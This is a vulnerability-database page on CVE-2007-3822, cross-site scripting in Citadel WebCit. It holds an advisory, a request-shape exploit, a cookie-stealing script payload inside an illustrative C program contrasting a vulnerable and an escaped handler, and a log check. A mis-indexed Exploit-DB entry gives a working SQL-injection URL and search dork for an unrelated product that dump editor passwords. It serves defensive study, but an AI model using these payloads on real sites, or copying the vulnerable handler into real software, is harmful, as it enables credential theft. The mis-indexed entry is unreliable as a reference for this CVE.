CVE-2007-3822
Published 2007-07-17
Priority: P4 (13) low
CVSS 2.0: 2.6 (AV:N/AC:H/Au:N/C:N/I:P/A:N)
Exploit: public PoC available (Exploit-DB, see below)
EPSS: 2.48% (82.6th percentile)
Multiple cross-site scripting (XSS) vulnerabilities in Webcit before 7.11 allow remote attackers to inject arbitrary web script or HTML via (1) the who parameter to showuser; and other vectors involving (2) calendar mode, (3) bulletin board mode, (4) room names, and (5) uploaded file names.
Affected
1 range
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| citadel | webcit | <= 7.10 | — |
No detection rules found.
Exploit-DB
CVE-2007-3822 Citadel WebCit 7.02/7.10 - 'showuser?who' Cross-Site Scripting (exploitdb, 2007-07-14)
---
source: https://www.securityfocus.com/bid/24913/info
Citadel WebCit is prone to multiple input-validation vulnerabilities, including multiple HTML-injection issues and a cross-site scripting issue, because it fails to sufficiently sanitize user-supplied input data.
Exploiting these issues may allow an attacker to execute HTML and script code in the context of the affected site, to steal cookie-based authentication credentials, or to control how the site is rendered to the user; other attacks are also possible.
Versions prior to WebCit 7.11 are vulnerable.
http://www.example.com/showuser?who=[xss]
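The advisory above names the cause (user input reaches the page without sanitization) and the Exploit-DB entry shows the request shape, but neither shows the defect or the fix in code. The following C program is an added example, not WebCit's source and not taken from the advisory: a showuser-style handler that splices the decoded `who` parameter into HTML verbatim, beside the same handler with HTML escaping at the output point, plus a crude request-line check for a `showuser?who=` value carrying markup characters (the page lists no detection rules). The function names, the page template, the query-string and percent-decoding helpers, and the sample query string are all constructed for this illustration and are not part of WebCit.

```c
#include <ctype.h>
#include <stdio.h>
#include <string.h>

/* Constructed sample query: the advisory's showuser?who=[xss] shape with a concrete payload. */
const char *sample_query =
    "room=lobby&who=%3Cscript%3Ealert(document.cookie)%3C%2Fscript%3E";

static int hexval(int c) {                 /* value of a hex digit, or -1 */
    const char *d = "0123456789abcdef", *h = c ? strchr(d, tolower(c)) : NULL;
    return h ? (int)(h - d) : -1;
}

/* Percent-decode inlen bytes of a query value ('+' becomes a space); returns decoded length. */
size_t url_decode(const char *in, size_t inlen, char *out, size_t outlen) {
    size_t o = 0;
    for (size_t i = 0; i < inlen && o + 1 < outlen; i++) {
        int hi = (in[i] == '%' && i + 2 < inlen) ? hexval((unsigned char)in[i + 1]) : -1;
        int lo = (hi >= 0) ? hexval((unsigned char)in[i + 2]) : -1;
        if (lo >= 0) {
            out[o++] = (char)(hi * 16 + lo);
            i += 2;
        } else {
            out[o++] = (in[i] == '+') ? ' ' : in[i];
        }
    }
    out[o] = '\0';
    return o;
}

/* Find `name` in "a=1&who=x" and store its decoded value; returns 1 if present, else 0. */
int query_param(const char *query, const char *name, char *out, size_t outlen) {
    size_t nlen = strlen(name), plen;
    out[0] = '\0';
    for (const char *p = query; *p != '\0' && *p != ' '; p += plen + (p[plen] == '&')) {
        plen = strcspn(p, "& ");   /* a space ends the query string inside a request line */
        if (plen > nlen && strncmp(p, name, nlen) == 0 && p[nlen] == '=') {
            url_decode(p + nlen + 1, plen - nlen - 1, out, outlen);
            return 1;
        }
    }
    return 0;
}

/* HTML-escape the five characters that let a value break out of element or attribute text. */
size_t html_escape(const char *in, char *out, size_t outlen) {
    static const char special[] = "&<>\"'";
    static const char *const entity[] = { "&amp;", "&lt;", "&gt;", "&quot;", "&#39;" };
    size_t o = 0;
    for (; *in != '\0'; in++) {
        char one[2] = { *in, '\0' };
        const char *hit = strchr(special, *in);
        const char *rep = hit ? entity[hit - special] : one;
        size_t rl = strlen(rep);
        if (o + rl >= outlen) break;
        memcpy(out + o, rep, rl);
        o += rl;
    }
    out[o] = '\0';
    return o;
}

/* Vulnerable pattern: the decoded parameter is spliced into the page verbatim. */
void render_showuser_vulnerable(const char *query, char *page, size_t len) {
    char who[256];
    query_param(query, "who", who, sizeof who);
    snprintf(page, len, "<html><body><h1>User profile: %s</h1></body></html>", who);
}

/* Fixed pattern: same page, but the value is escaped at the point it meets HTML. */
void render_showuser_fixed(const char *query, char *page, size_t len) {
    char who[256], safe[6 * 256];
    query_param(query, "who", who, sizeof who);
    html_escape(who, safe, sizeof safe);
    snprintf(page, len, "<html><body><h1>User profile: %s</h1></body></html>", safe);
}

/* Render with either handler and report whether a raw <script tag reached the page. */
int page_has_raw_script(const char *query, int use_fixed) {
    char page[2048];
    if (use_fixed) render_showuser_fixed(query, page, sizeof page);
    else render_showuser_vulnerable(query, page, sizeof page);
    return strstr(page, "<script") != NULL;
}

/* Crude access-log check: a showuser request whose decoded "who" carries markup characters. */
int showuser_request_suspicious(const char *request_line) {
    const char *q = strstr(request_line, "showuser?");
    char who[256];
    if (q == NULL || !query_param(q + strlen("showuser?"), "who", who, sizeof who)) return 0;
    return strpbrk(who, "<>\"'") != NULL;
}

int main(void) {
    char page[2048];
    render_showuser_vulnerable(sample_query, page, sizeof page); printf("vulnerable: %s\n", page);
    render_showuser_fixed(sample_query, page, sizeof page);      printf("fixed: %s\n", page);
    return 0;
}
```

The fix is output encoding at the template, not input filtering: the same `who` value is accepted by both handlers, and only the point where it is written into HTML changes. The log check is deliberately loose (any of `<>"'` in the decoded value) and will flag some legitimate names; it is a triage filter for web server access logs, not a signature.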
Exploit-DB (indexed against a different CVE, CVE-2007-0305; this entry concerns Okul Web Otomasyon Sistemi, not Webcit)
CVE-2007-0305 Okul Web Otomasyon Sistemi 4.0.1 - SQL Injection (exploitdb, 2007-01-15)
---
AYYILDIZ.ORG Presents...
Script: Okul Web Otomasyon Sistemi
Script Download: http://www.aspindir.com/Goster/3822
Contact: ilker Kandemir
Dork: inurl:etkinlikbak.asp
Exploit: etkinlikbak.asp?id=-1%20union%20select%200,editor,sifre,3,4,5%20from%20editor
Editor Panel: editor_gir.asp
Thanks: H0tturk, Dr.Max Virus, PcDelisi, CodeR, Dumenci
Special thanks: Asianeagle, AYYILDIZ.ORG
# milw0rm.com [2007-01-15]
No writeups or analysis indexed.
References
http://osvdb.org/38176
http://osvdb.org/38177
http://osvdb.org/38178
http://osvdb.org/38179
http://osvdb.org/38180
http://secunia.com/advisories/26090
http://securityreason.com/securityalert/2890
http://www.securityfocus.com/archive/1/473714/100/0/threaded
http://www.securityfocus.com/bid/24913
https://exchange.xforce.ibmcloud.com/vulnerabilities/35433